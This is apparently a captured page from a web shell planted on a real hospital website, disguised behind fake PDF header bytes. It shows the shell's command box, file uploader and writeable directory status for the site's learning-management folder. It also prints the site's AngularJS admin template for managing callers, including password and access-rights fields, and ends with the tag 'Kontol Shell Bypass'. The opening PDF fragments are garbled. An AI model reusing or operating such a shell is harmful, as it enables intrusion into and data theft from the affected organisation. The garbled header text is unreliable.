%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/views/user/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/views/user/counselors_list.html
<div class="page-bar">
    <ul class="page-breadcrumb uc">
        <li><h2>Manage Callers</h2></li>
    </ul>
    <div class="page-toolbar">
        <a href="" class="btn blue btn-outline pull-right" ng-click="CR.open_form()"><i class="fa fa-plus"></i> Add New</a>
    </div>
</div>
<!-- -->

<div>
    <!-- Search -->
    <div class="form-group">
        <form ng-submit="CR.lists()">
            <div class="form-inline fc-sm">
                <input type="text" ng-model="CR.sdata.k" class="form-control w200" placeholder="Keyword..." />
                <select class="form-control" ng-model="CR.sdata.parent_id">
                    <option value="">Manager (ALL)</option>
                    <option value="{{r.id}}" ng-repeat="r in CR.caller_managers">{{r.name}}</option>
                </select>&nbsp;
                <button type="submit" class="btn btn-info">Search</button>
            </div>
        </form>
    </div>
    <!-- / -->

    <div ng-if="CR.result.length">
        <div class="text-secondary bold mb10">
            Showing {{CR.page.start+1}} - {{CR.page.start+CR.page.total}} of {{CR.page.total_records}} records.
        </div>
        <div class="table-responsive">
            <table class="table table-striped table-bordered table-advance table-hover tablemd">
                <thead class="vmid uc">
                    <tr>
                        <th class="w20">SN</th>
                        <th>Caller Name</th>
                        <th class="w200">Caller Email</th>
                        <th class="w150">Manager</th>
                        <th class="w150">Created By</th>
                        <th class="w100">Created On</th>
                        <th class="w60">Status</th>
                        <th class="w85"></th>
                    </tr>
                </thead>

                <tbody>
                    <tr ng-repeat="(i,r) in CR.result">
                        <td>{{i+CR.page.start+1}}.</td>
                        <td>
                            {{r.name}}
                            <!-- <span ng-if="r.data_set"><i class="fa fa-check-circle text-success"></i></span> -->
                            <div class="pdT5">
                                <div class="note-text pb5">
                                    <!-- <a href="" class="pull-right" ng-click="CR.open_assign_dataset(r)">
                                        {{r.data_set?'Change':'Assign Data Set'}}
                                    </a> -->
                                    <div>Data Set: <strong>{{r.data_set?r.data_set:'N/A'}}</strong></div>
                                    <div ng-if="r.data_set">No. of Leads: <strong>{{r.ds_no_of_leads}}</strong></div>
                                    <div ng-if="r.data_set" class="pt3">
                                        <button type="button" class="btn btn-xs dark" ng-click="CR.getSplitDatasetHistory(r.id)">View Dataset History</button>
                                    </div>
                                </div>
                                <div class="note-text">
                                    <a href="" ng-click="CR.edit(r.id, 'T')" class="font-purple uc">Make Clone</a>
                                </div>
                            </div>
                        </td>
                        <td>{{r.email}}</td>
                        <td>{{r.caller_manager}}</td>
                        <td>{{r.usr}}</td>
                        <td>{{get_date(r.created)}}</td>
                        <td>
                            <span class="label label-sm label-success label-mini" ng-if="r.status=='1'">Active</span>
                            <span class="label label-sm label-danger label-mini" ng-if="r.status=='0'">Inactive</span>
                        </td>
                        <td class="text-center">
                            <div class="btn-group btn-group-solid">
                                <button type="button" class="btn btn-xs default" ng-click="CR.edit(r.id)"><i class="fa fa-edit"></i></button>
                                <button type="button" class="btn btn-xs red" ng-click="CR.delete(r.id)"><i class="fa fa-trash-o"></i></button>
                            </div>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
        <div class="bold" ng-show="CR.page.total_pages>1">
            <div dir-paging fn="CR.lists" pageob="CR.page"></div>
        </div>
    </div>
    <div class="text-center text-default pd20" ng-if="!CR.result.length">No record found.</div>
</div>


<!-- Form -->
<div class="modal bs-modal-lg in modal-scroll" id="formModal" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">{{CR.dtl.id?'Update':'Add'}} Counselor/Caller</h4>
            </div>
            
            <div class="modal-body fi-300 err-abs">
                <form id="frm" autocomplete="off" spellcheck="false">
                    <input type="hidden" name="id" value="{{CR.dtl.id}}" />
                    <table class="form-tbl">
                        <tr>
                            <td class="req">Caller Name</td>
                            <td><input type="text" class="form-control" name="name" ng-model="CR.dtl.name" maxlength="100"></td>
                        </tr>
                        
                        <tr>
                            <td class="req">Mobile No.</td>
                            <td><input type="text" class="form-control" name="mobile" ng-model="CR.dtl.mobile" maxlength="10"></td>
                        </tr>
                    </table>
                    <hr class="minus14" />
                    
                    <table class="form-tbl">
                        <tr>
                            <td class="req">Email</td>
                            <td><input type="text" class="form-control" name="email" ng-model="CR.dtl.email" maxlength="100"></td>
                        </tr>
                        <tr>
                            <td class="{{CR.dtl.id?'':'req'}}">Password</td>
                            <td><input type="text" class="form-control" name="password" ng-model="CR.dtl.password" maxlength="100"></td>
                        </tr>
                    </table>
                    <hr class="minus14" />
                    
                    <table class="form-tbl">
                        <tr>
                            <td class="req">Caller Manager</td>
                            <td>
                                <select class="form-control" name="parent_id" ng-model="CR.dtl.parent_id">
                                    <option value="">Select</option>
                                    <option value="{{r.id}}" ng-repeat="r in CR.caller_managers">{{r.name}}</option>
                                </select>
                            </td>
                        </tr>
                    </table>
                    <hr class="minus14" />

                    <table class="form-tbl">
                        <!-- <tr>
                            <td>Data Set</td>
                            <td>
                                <select class="form-control" name="data_set_id" ng-model="CR.dtl.data_set_id">
                                    <option value="">Select</option>
                                    <option value="{{r.id}}" ng-repeat="r in CR.datasets">{{r.title}}</option>
                                </select>
                            </td>
                        </tr> -->

                        <tr>
                            <td>Access Rights</td>
                            <td>
                                <div class="form-control">
                                    <div class="" ng-repeat="r in CR.modules">
                                        <label>
                                            <input type="checkbox" class="mchk" name="modules[]" value="{{r.id}}" /> {{r.module}}
                                        </label>
                                    </div>
                                </div>
                            </td>
                        </tr>
                    </table>
                    <hr class="minus14" />

                    <table class="form-tbl">
                        <tr>
                            <td>Status</td>
                            <td>
                                <select class="form-control" name="status" ng-model="CR.dtl.status">
                                    <option value="1">Active</option>
                                    <option value="0">Inactive</option>
                                </select>
                            </td>
                        </tr>
                    </table>
                </form>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
                <button type="button" class="btn green" ng-click="CR.save()">Save</button>
            </div>
        </div>
    </div>
</div>

<!-- Assign dataset -->
<div class="modal bs-modal-lg in" id="assignDSModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">Assign Data Set To: {{CR.rOb.name}}</h4>
            </div>
            
            <div class="modal-body">
                <div class="mb10">Currently Assigned: <strong>{{CR.rOb.data_set?CR.rOb.data_set:'N/A'}}</strong></div>
                <div class="mb5">
                    <div class="input-icon right">
                        <i class="fa fa-search font-yellow"></i>
                        <input type="text" class="form-control input-sm" ng-model="CR.search_ds" placeholder="Search">
                    </div>
                </div>
                <table class="table table-condensed table-striped table-bordered table-advance table-hover">
                    <tbody class="vmid">
                        <tr ng-repeat="(i,r) in CR.datasets | filter:CR.search_ds">
                            <td class="w20">{{i+1}}.</td>
                            <td class="w20">
                                <button type="button" class="btn btn-xs btn-success" ng-click="CR.assign_dataset(r.id)">Assign</button>
                            </td>
                            <td>{{r.title}}</td>
                            <td class="w100">{{r.created}}</td>
                        </tr>
                    </tbody>
                </table>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
            </div>
        </div>
    </div>
</div>

<!-- Dataset History -->
<div class="modal bs-modal-lg in" id="dsHistoryModal" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true" ng-click="CR.dsHistory={}"></button>
                <h4 class="modal-title">Dataset History</h4>
            </div>
            
            <div class="modal-body">
                <div class="mb10">
                    Caller: <strong>{{CR.dsHistory.name}}</strong>
                </div>
                <div class="table-responsive" ng-if="CR.dsHistory.splitDatasetHistory.length">
                    <table class="table table-bordered table-advance tablemd">
                        <thead class="vmid uc">
                            <tr>
                                <th class="w20">SN</th>
                                <th>Dataset</th>
                                <th class="w100 nowrap text-center">No. Of Leads</th>
                                <th class="w100 nowrap">Given On</th>
                                <th class="w150 nowrap">Given By</th>
                            </tr>
                        </thead>
                        <tbody class="">
                            <tr ng-repeat="(i,r) in CR.dsHistory.splitDatasetHistory">
                                <td>{{i+1}}.</td>
                                <td>{{r.dataset}}</td>
                                <td class="text-center">{{r.no_of_leads}}</td>
                                <td class="nowrap">{{r.created}}</td>
                                <td>{{r.created_by}}</td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal" ng-click="CR.dsHistory={}">Close</button>
            </div>
        </div>
    </div>
</div>

Kontol Shell Bypass